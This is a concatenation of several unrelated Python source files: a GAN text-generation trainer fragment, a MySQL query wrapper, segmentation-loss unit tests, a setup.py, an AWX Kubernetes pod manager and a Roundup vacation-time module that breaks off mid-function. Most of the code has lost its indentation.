if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def optimize_multi(opts, losses):
for i, (opt, loss) in enumerate(zip(opts, losses)):
opt.zero_grad()
loss.backward(retain_graph=True if i < len(opts) - 1 else False)
opt.step()
@staticmethod
def optimize(opt, loss, model=None, retain_graph=False):
opt.zero_grad()
loss.backward(retain_graph=retain_graph)
if model is not None:
torch.nn.utils.clip_grad_norm_(model.parameters(), cfg.clip_norm)
opt.step()
def show_config(self):
self.log.info(100 * '=')
self.log.info('> training arguments:')
for arg in vars(self.opt):
self.log.info('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))
self.log.info(100 * '=')
def cal_metrics(self, fmt_str=False):
"""
Calculate metrics
:param fmt_str: if True, return a formatted string for logging
"""
eval_samples = self.gen.sample(cfg.samples_num, 4 * cfg.batch_size)
self.gen_data.reset(eval_samples)
new_gen_tokens = tensor_to_tokens(eval_samples, self.index_word_dict)
self.bleu.test_text = new_gen_tokens
self.self_bleu.real_text = new_gen_tokens
self.self_bleu.test_text = tensor_to_tokens(self.gen.sample(200, 200), self.index_word_dict)
# BLEU-[2,3,4,5]
bleu_score = self.bleu.get_score(ignore=False)
# Self-BLEU
self_bleu_score = self.self_bleu.get_score(ignore=False)
# NLL_gen
gen_nll = self.eval_gen(self.gen,
self.train_data.loader,
self.mle_criterion)
if fmt_str:
return 'BLEU-%s = %s, gen_NLL = %.4f, self_bleu = %s,' % (
self.bleu.gram, bleu_score, gen_nll, self_bleu_score)
return bleu_score, gen_nll, self_bleu_score
def _save(self, phrase, epoch):
"""Save model state dict and generator's samples"""
torch.save(self.gen.state_dict(), cfg.save_model_root + 'gen_{}_{:05d}.pt'.format(phrase, epoch))
save_sample_path = cfg.save_samples_root + 'samples_{}_{:05d}.txt'.format(phrase, epoch)
samples = self.gen.sample(cfg.batch_size, cfg.batch_size)
write_tokens(save_sample_path, tensor_to_tokens(samples, self.index_word_dict))
|
"""Mysql wrappers to execute mysql statements.
The default behaviour depends on the configuration module which contains the
database settings to use.
"""
from contextlib import contextmanager
from functools import wraps
import logging
import MySQLdb
from helot_common import configuration
@contextmanager
def db_connection(host=None, user=None, passwd=None, db=None,
connect_to_db=True):
"""Auto closing db connection context manager.
Yields an active db connection which will be closed automatically.
:parameter connect_to_db: (boolean) True to connect to the database.
Otherwise it will not connect to a specific database, something that can be
useful in the case of a database creation.
"""
params = {
'host': host or configuration.mysql.host,
'user': user or configuration.mysql.user,
'passwd': passwd or configuration.mysql.passwd
}
if connect_to_db:
params['db'] = db or configuration.mysql.db
db_conn = MySQLdb.connect(**params)
yield db_conn
db_conn.close()
@contextmanager
def db_cursor(db_conn):
"""Auto closing db cursor context manager.
Yields a live db cursor which will be closed automatically.
:parameter db_conn: The db connection to use for the creation of the cursor.
"""
cur = db_conn.cursor()
yield cur
cur.close()
@contextmanager
def make_query_executor(*args, **kwargs):
"""Context manager providing a function to execute sql queries.
Yields a query executor function.
"""
with db_connection(*args, **kwargs) as db_conn, db_cursor(db_conn) as cur:
def execute_query(sql):
cur.execute(sql)
col_names = [col_data[0] for col_data in cur.description]
for row in cur.fetchall():
row_data = _RawData()
for i, cell in enumerate(row):
setattr(row_data, col_names[i], cell)
yield row_data
yield execute_query
@contextmanager
def make_non_query_executor(*args, **kwargs):
"""Context manager providing a function to execute non query statements.
Yields a non query executor function.
:parameter connect_to_db: (boolean, forwarded to db_connection) True to
connect to the database. Otherwise it will not connect to a specific
database, something that can be useful in the case of a database creation.
"""
with db_connection(*args, **kwargs) as db_conn, db_cursor(db_conn) as cur:
def execute_non_query(sql):
try:
cur.execute(sql)
db_conn.commit()
except Exception as ex:
logging.exception(ex)
db_conn.rollback()
yield execute_non_query
class _RawData(object):
"""Used to create the object to encapsulate the data of retrieved row."""
def query_executor_user(function_to_decorate):
"""Decorates a function adding an execute query function argument.
When it decorates a function, the function's signature must contain an
argument called execute_query, which will receive a sql executor to use for queries.
:parameter function_to_decorate: The function to decorate.
:returns : The decorated function containing the execute_query argument.
"""
@wraps(function_to_decorate)
def decorator(*args, **kargs):
with make_query_executor() as execute_query:
kargs['execute_query'] = execute_query
return function_to_decorate(*args, **kargs)
return decorator
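# Illustrative sketch of a decorated function (table and column names are
# hypothetical); the injected execute_query yields one _RawData object per row.
@query_executor_user
def _example_list_user_names(execute_query=None):
    return [row.name for row in execute_query("SELECT name FROM users")]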
def execute_query(sql, **kwargs):
"""Simplest way to execute a query.
Opens and closes a new connection and cursor every time called.
:param sql: (str) The sql statement to execute.
:param kwargs: The connection settings.
Yields a sequence of rows coming from the execution of the query.
"""
with make_query_executor(**kwargs) as executor:
for row in executor(sql):
yield row
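# Minimal usage sketch (hypothetical SQL and connection settings): a fresh
# connection and cursor are opened, rows are yielded as _RawData objects and
# everything is closed once the generator is exhausted.
#
#   for row in execute_query("SELECT id, name FROM users",
#                            host="localhost", user="app", passwd="secret", db="appdb"):
#       print(row.id, row.name)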
|
import pytest
import torch
import segmentation_models_pytorch as smp
import segmentation_models_pytorch.losses._functional as F
from segmentation_models_pytorch.losses import (
DiceLoss,
JaccardLoss,
SoftBCEWithLogitsLoss,
SoftCrossEntropyLoss,
TverskyLoss,
)
def test_focal_loss_with_logits():
input_good = torch.tensor([10, -10, 10]).float()
input_bad = torch.tensor([-1, 2, 0]).float()
target = torch.tensor([1, 0, 1])
loss_good = F.focal_loss_with_logits(input_good, target)
loss_bad = F.focal_loss_with_logits(input_bad, target)
assert loss_good < loss_bad
def test_softmax_focal_loss_with_logits():
input_good = torch.tensor([[0, 10, 0], [10, 0, 0], [0, 0, 10]]).float()
input_bad = torch.tensor([[0, -10, 0], [0, 10, 0], [0, 0, 10]]).float()
target = torch.tensor([1, 0, 2]).long()
loss_good = F.softmax_focal_loss_with_logits(input_good, target)
loss_bad = F.softmax_focal_loss_with_logits(input_bad, target)
assert loss_good < loss_bad
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5],
[[1, 1, 1, 1], [1, 1, 0, 0], 0.5, 1e-5],
],
)
def test_soft_jaccard_score(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_jaccard_score(y_pred, y_true, eps=eps)
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[[1, 1, 0, 0], [0, 0, 1, 1]], [[1, 1, 0, 0], [0, 0, 1, 1]], 1.0, 1e-5],
[[[1, 1, 0, 0], [0, 0, 1, 1]], [[0, 0, 1, 0], [0, 1, 0, 0]], 0.0, 1e-5],
[[[1, 1, 0, 0], [0, 0, 0, 1]], [[1, 1, 0, 0], [0, 0, 0, 0]], 0.5, 1e-5],
],
)
def test_soft_jaccard_score_2(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_jaccard_score(y_pred, y_true, dims=[1], eps=eps)
actual = actual.mean()
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5],
[[1, 1, 1, 1], [1, 1, 0, 0], 2.0 / 3.0, 1e-5],
],
)
def test_soft_dice_score(y_true, y_pred, expected, eps):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_dice_score(y_pred, y_true, eps=eps)
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps", "alpha", "beta"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5, 0.5, 0.5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5, 0.5, 0.5],
[[1, 1, 1, 1], [1, 1, 0, 0], 2.0 / 3.0, 1e-5, 0.5, 0.5],
],
)
def test_soft_tversky_score(y_true, y_pred, expected, eps, alpha, beta):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_tversky_score(y_pred, y_true, eps=eps, alpha=alpha, beta=beta)
assert float(actual) == pytest.approx(expected, eps)
@torch.no_grad()
def test_dice_loss_binary():
eps = 1e-5
criterion = DiceLoss(mode=smp.losses.BINARY_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 1, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
@torch.no_grad()
def test_tversky_loss_binary():
eps = 1e-5
# with alpha=0.5; beta=0.5 it is equal to DiceLoss
criterion = TverskyLoss(mode=smp.losses.BINARY_MODE, from_logits=False, alpha=0.5, beta=0.5)
# Ideal case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 1, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
@torch.no_grad()
def test_binary_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.BINARY_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([1.0]).view(1, 1, 1, 1)
y_true = torch.tensor(([1])).view(1, 1, 1, 1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, eps)
@torch.no_grad()
def test_multiclass_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.MULTICLASS_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[0, 0, 1, 1]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[1, 1, 0, 0]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
# 1 - 1/3 case
y_pred = torch.tensor([[[1.0, 0.0, 1.0, 0.0], [0.0, 1.0, 0.0, 1.0]]])
y_true = torch.tensor([[1, 1, 0, 0]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0 - 1.0 / 3.0, abs=eps)
@torch.no_grad()
def test_multilabel_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.MULTILABEL_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = 1 - y_pred
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
# 1 - 1/3 case
y_pred = torch.tensor([[[0.0, 1.0, 1.0, 0.0], [0.0, 1.0, 1.0, 0.0]]])
y_true = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [1.0, 1.0, 0.0, 0.0]]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0 - 1.0 / 3.0, abs=eps)
@torch.no_grad()
def test_soft_ce_loss():
criterion = SoftCrossEntropyLoss(smooth_factor=0.1, ignore_index=-100)
# Ideal case
y_pred = torch.tensor([[+9, -9, -9, -9], [-9, +9, -9, -9], [-9, -9, +9, -9], [-9, -9, -9, +9]]).float()
y_true = torch.tensor([0, 1, -100, 3]).long()
loss = criterion(y_pred, y_true)
print(loss)
@torch.no_grad()
def test_soft_bce_loss():
criterion = SoftBCEWithLogitsLoss(smooth_factor=0.1, ignore_index=-100)
# Ideal case
y_pred = torch.tensor([-9, 9, 1, 9, -9]).float()
y_true = torch.tensor([0, 1, -100, 1, 0]).long()
loss = criterion(y_pred, y_true)
print(loss)
|
from setuptools import setup, find_packages
packages_ = find_packages()
packages = [p for p in packages_ if p != 'tests']
setup(name='microgridRLsimulator',
version='',
description='',
url='',
author='',
author_email='',
license='',
packages=packages,
install_requires=[
'python-dateutil', 'docopt==0.6.2', 'matplotlib==3.0.2', 'numpy==1.15.4',
'pandas==0.23.4', 'scipy==1.1.0', 'tensorflow==1.12.0', 'tflearn==0.3.2', 'sphinx'
],
zip_safe=False)
|
import collections
import logging
from base64 import b64encode
from django.conf import settings
from kubernetes import client, config
from django.utils.functional import cached_property
from awx.main.utils.common import parse_yaml_or_json
from awx.main.utils.execution_environments import get_default_pod_spec
logger = logging.getLogger('awx.main.scheduler')
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
class PodManager(object):
def __init__(self, task=None):
self.task = task
@classmethod
def list_active_jobs(cls, instance_group):
task = collections.namedtuple('Task', 'id instance_group')(id='', instance_group=instance_group)
pm = PodManager(task)
pods = {}
try:
for pod in pm.kube_api.list_namespaced_pod(pm.namespace, label_selector='ansible-awx={}'.format(settings.INSTALL_UUID)).to_dict().get('items', []):
job = pod['metadata'].get('labels', {}).get('ansible-awx-job-id')
if job:
try:
pods[int(job)] = pod['metadata']['name']
except ValueError:
pass
except Exception:
logger.exception('Failed to list pods for container group {}'.format(instance_group))
return pods
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def credential(self):
return self.task.instance_group.credential
@cached_property
def kube_config(self):
return generate_tmp_kube_config(self.credential, self.namespace)
@cached_property
def kube_api(self):
# this feels a little janky, but it's what k8s' own code does
# internally when it reads kube config files from disk:
# https://github.com/kubernetes-client/python-base/blob/0b208334ef0247aad9afcaae8003954423b61a0d/config/kube_config.py#L643
if self.credential:
loader = config.kube_config.KubeConfigLoader(config_dict=self.kube_config)
cfg = type.__call__(client.Configuration)
loader.load_and_set(cfg)
api = client.CoreV1Api(api_client=client.ApiClient(configuration=cfg))
else:
config.load_incluster_config()
api = client.CoreV1Api()
return api
@property
def pod_name(self):
return f"automation-job-{self.task.id}"
@property
def pod_definition(self):
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}), dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.id)})
)
pod_spec['spec']['containers'][0]['name'] = self.pod_name
return pod_spec
def generate_tmp_kube_config(credential, namespace):
host_input = credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": namespace}}],
"current-context": host_input,
}
if credential.get_input('verify_ssl') and 'ssl_ca_cert' in credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
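# Illustrative sketch (hypothetical container group and namespace): build an
# in-memory kubeconfig dict from an AWX kubernetes credential and feed it to the
# kubernetes client, mirroring what PodManager.kube_api does above.
#
#   cfg_dict = generate_tmp_kube_config(instance_group.credential, namespace="awx-jobs")
#   loader = config.kube_config.KubeConfigLoader(config_dict=cfg_dict)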
|
#! /usr/bin/python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2014 Dr. Ralf Schlatterbeck Open Source Consulting.
# Reichergasse 131, A-3411 Weidling.
# Web: http://www.runtux.com Email: office@runtux.com
# All rights reserved
# ****************************************************************************
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
# ****************************************************************************
#
#++
# Name
# vacation
#
# Purpose
# Vacation-related routines
#--
#
from math import ceil
from roundup.date import Date, Interval
from freeze import freeze_date
import common
import user_dynamic
def public_holiday_wp (db, user, date) :
""" Get first public holiday wp for this user on date.
There should typically be only one; we use the first in the list
without further checks.
"""
opn = db.time_project_status.lookup ('Open')
prj = db.time_project.filter \
(None, dict (is_public_holiday = True, status = opn))
if not prj :
return None
wps = \
( db.time_wp.filter \
(None, dict (project = prj, is_public = True))
+ db.time_wp.filter \
(None, dict (project = prj, bookers = user))
)
for wpid in wps :
w = db.time_wp.getnode (wpid)
if ( w.time_start <= date
and (not w.time_end or date < w.time_end)
) :
return wpid
# end def public_holiday_wp
def try_create_public_holiday (db, daily_record, date, user) :
st_open = db.daily_record_status.lookup ('open')
wp = public_holiday_wp (db, user, date)
# Don't change anything if status not open
if db.daily_record.get (daily_record, 'status') != st_open :
return
# Only perform public holiday processing if user has a public
# holiday wp to book on.
if not wp :
return
dyn = user_dynamic.get_user_dynamic (db, user, date)
wh = user_dynamic.day_work_hours (dyn, date)
if wh :
loc = db.org_location.get (dyn.org_location, 'location')
hol = db.public_holiday.filter \
( None
, { 'date' : common.pretty_range (date, date)
, 'locations' : loc
}
)
if hol and wh :
holiday = db.public_holiday.getnode (hol [0])
if holiday.is_half :
wh = wh / 2.
wh = user_dynamic.round_daily_work_hours (wh)
# Check if there already is a public-holiday time_record
# Update duration (and wp) if wrong
trs = db.time_record.filter \
(None, dict (daily_record = daily_record))
for trid in trs :
tr = db.time_record.getnode (trid)
if tr.wp is None :
continue
tp = db.time_project.getnode \
(db.time_wp.get (tr.wp, 'project'))
if tp.is_public_holiday :
d = {}
if tr.duration != wh :
d ['duration'] = wh
if tr.wp != wp :
d ['wp'] = wp
if d :
db.time_record.set (trid, ** d)
return
comment = holiday.name
if holiday.description :
comment = '\n'.join ((holiday.name, holiday.description))
db.time_record.create \
( daily_record = daily_record
, duration = wh
, wp = wp
, comment = comment
, work_location = db.work_location.lookup ('off')
)
# end def try_create_public_holiday
def create_daily_recs (db, user, first_day, last_day) :
d = first_day
while d <= last_day :
pr = common.pretty_range (d, d)
x = db.daily_record.filter (None, dict (user = user, date = pr))
if x :
assert len (x) == 1
x = x [0]
else :
dyn = user_dynamic.get_user_dynamic (db, user, d)
if not dyn :
d += common.day
continue
x = db.daily_record.create \
( user = user
, date = d
, weekend_allowed = False
, required_overtime = False
)
try_create_public_holiday (db, x, d, user)
d += common.day
# end def create_daily_recs
def leave_submissions_on_date (db, user, date, filter = None) :
""" Return all leave records that overlap with the given date.
Optionally restrict search if filter is specified.
"""
dts = ';%s' % date.pretty (common.ymd)
dte = '%s;' % date.pretty (common.ymd)
d = dict (user = user, first_day = dts, last_day = dte)
if filter :
d.update (filter)
vs = db.leave_submission.filter (None, d)
return [db.leave_submission.getnode (v) for v in vs]
# end def leave_submissions_on_date
def leave_days (db, user, first_day, last_day) :
d = first_day
s = 0.0
while d <= last_day :
dyn = user_dynamic.get_user_dynamic (db, user, d)
if not dyn :
d += common.day
continue
wh = user_dynamic.day_work_hours (dyn, d)
ld = leave_duration (db, user, d)
if ld != 0 :
s += ceil (ld / wh * 2) / 2.
d += common.day
return s
# end def leave_days
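# Worked example of the half-day rounding above (hypothetical numbers): with a
# 7.7 hour working day and 5 hours of leave, ceil (5 / 7.7 * 2) / 2. == 1.0,
# and with 3 hours of leave on an 8 hour day, ceil (3 / 8. * 2) / 2. == 0.5,
# i.e. leave is always rounded up to the nearest half day.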
def leave_duration (db, user, date, ignore_public_holiday = False) :
""" Duration of leave on a single day to be booked. """
dyn = user_dynamic.get_user_dynamic (db, user, date)
wh = user_dynamic.day_work_hours (dyn, date)
if not wh :
return 0.0
dt = common.pretty_range (date, date)
dr = db.daily_record.filter (None, dict (user = user, date = dt))
assert len (dr) == 1
try_create_public_holiday (db, dr [0], date, user)
trs = db.time_record.filter (None, dict (daily_record = dr [0]))
bk = 0.0
if not ignore_public_holiday :
for trid in trs :
tr = db.time_record.getnode (trid)
if not tr.wp :
continue
wp = db.time_wp.getnode (tr.wp)
tp = db.time_project.getnode (wp.project)
if tp.is_public_holiday :
bk += tr.duration
assert bk <= wh
return wh - bk
# end def leave_duration
def leave_submission_days (db, user, ctype, start, end, type, * stati) :
""" Sum leave submissions of the given type
with the given status in the given time range for the given user
and ctype (contract_type).
"""
assert start <= end
dt = common.pretty_range (start, end)
dts = ';%s' % start.pretty (common.ymd)
dte = '%s;' % end.pretty (common.ymd)
if type == 'vacation' :
lwp = vacation_wps (db)
elif type == 'flexi' :
lwp = flexi_wps (db)
else :
lwp = special_wps (db)
d = dict (user = user, status = list (stati), time_wp = lwp)
d1 = dict (d, first_day = dt)
vs1 = db.leave_submission.filter (None, d1)
d2 = dict (d, last_day = dt)
vs2 = db.leave_submission.filter (None, d2)
d3 = dict (d, first_day = dts, last_day = dte)
vs3 = db.leave_submission.filter (None, d3)
vss = dict.fromkeys (vs1 + vs2 + vs3).keys ()
vss = [db.leave_submission.getnode (i) for i in vss]
days = 0.0
for vs in vss :
first_day = vs.first_day
last_day = vs.last_day
dyn = user_dynamic.get_user_dynamic (db, user, first_day)
if not dyn :
continue
if dyn.contract_type != ctype :
continue
if first_day < start :
assert vs.last_day >= start
first_day = start
if last_day > end :
assert vs.first_day <= end
last_day = end
days += leave_days (db, user, first_day, last_day)
return days
# end def leave_submission_days
def vacation_submission_days (db, user, ctype, start, end, * stati) :
""" Sum vacation submissions with the given status in the given time
range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'vacation', * stati)
# end def vacation_submission_days
def flexitime_submission_days (db, user, ctype, start, end, * stati) :
""" Sum flexitime submissions with the given status in the given time
range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'flexi', * stati)
# end def flexitime_submission_days
def special_submission_days (db, user, ctype, start, end, * stati) :
""" Sum special_leave submissions with the given status in the given
time range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'special', * stati)
# end def special_submission_days
def next_yearly_vacation_date (db, user, ctype, date) :
d = date + common.day
dyn = vac_get_user_dynamic (db, user, ctype, d)
if not dyn or dyn.vacation_month is None or dyn.vacation_day is None :
assert 0
return None
y = int (d.get_tuple () [0])
next_date = Date \
('%04d-%02d-%02d' % (y, dyn.vacation_month, dyn.vacation_day))
if next_date < d :
next_date = Date \
('%04d-%02d-%02d' % (y + 1, dyn.vacation_month, dyn.vacation_day))
# Found a dyn user record too far in the future, can't determine
# next yearly vacation date
if dyn.valid_from > next_date :
# Hmmm, maybe started this year?
# Or re-started after some years?
prev = user_dynamic.prev_user_dynamic (db, dyn, use_ct = True)
if not prev or prev.valid_to < next_date :
return dyn.valid_from
return None
while dyn.valid_from <= next_date :
if dyn.valid_to > next_date :
# valid dyn record
return next_date
ndyn = vac_next_user_dynamic (db, dyn)
if ( not ndyn
or ndyn.valid_from > next_date
or ndyn.contract_type != ctype
) :
# use last dyn record, no next or too far in the future
return next_date
dyn = ndyn
yday = dyn.vacation_day
ymon = dyn.vacation_month
if yday is None or ymon is None :
return next_date
next_date = Date ('%04d-%02d-%02d' % (y, ymon, yday))
if next_date < d :
next_date = Date ('%04d-%02d-%02d' % (y + 1, ymon, yday))
# end def next_yearly_vacation_date
def prev_yearly_vacation_date (db, user, ctype, date) :
d = date - common.day
dyn = vac_get_user_dynamic (db, user, ctype, d)
if ( not dyn
or dyn.valid_from > d
or dyn.vacation_month is None
or dyn.vacation_day is None
) :
return None
y = int (d.get_tuple () [0])
prev_date = Date \
('%04d-%02d-%02d' % (y, dyn.vacation_month, dyn.vacation_day))
if prev_date >= date :
prev_date = Date \
('%04d-%02d-%02d' % (y - 1, dyn.vacation_month, dyn.vacation_day))
assert prev_date < date
while dyn.valid_from > prev_date :
dyn = vac_prev_user_dynamic (db, dyn)
if not dyn :
return prev_date
yday = dyn.vacation_day
ymon = dyn.vacation_month
if yday is None or ymon is None :
return prev_date
prev_date = Date ('%04d-%02d-%02d' % (y, ymon, yday))
if prev_date >= date :
prev_date = Date ('%04d-%02d-%02d' % (y - 1, ymon, yday))
return prev_date
# end def prev_yearly_vacation_date
def interval_days (iv) :
""" Compute number of days in a roundup.date Interval. The
difference should be computed from two dates (without time)
>>> D = Date
>>> I = Interval
>>> interval_days (D ('2014-01-07') - D ('2013-01-07'))
365
>>> interval_days (D ('2014-01-07') - D ('2012-01-07'))
731
>>> interval_days (I ('23d'))
23
>>> interval_days (I ('-23d'))
-23
>>> interval_days (D ('2012-01-07') - D ('2014-01-07'))
-731
"""
t = iv.get_tuple ()
assert abs (t [0]) == 1
assert t [1] == 0
assert t [2] == 0
return t [3] * t [0]
# end def interval_days
def get_vacation_correction (db, user, ctype = -1, date = None) :
